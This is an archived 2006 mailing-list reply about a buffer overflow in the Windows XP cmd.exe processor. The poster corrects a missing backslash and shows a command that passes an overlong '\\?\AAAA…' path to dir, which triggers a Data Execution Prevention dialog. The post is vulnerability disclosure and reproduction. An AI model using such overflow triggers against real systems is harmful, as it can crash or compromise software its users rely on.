Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
RE: Windows Command Processor CMD.EXE Buffer Overflow
From: Marvin Simkin (Marvin.Simkinasu.edu)
Date: Mon Oct 23 2006 - 10:05:29 CDT
> just for clarifying if you executed the command properly -- "\\?\" is required after dir cmd.. and not one with the single slash "\?\". to reproduce the issue in winxp sp2,
Sorry, one of the backslashes got lost somehow in copy and paste. With two backslashes it works as advertised and I get the DEP dialog.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>%COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[DEP dialog here]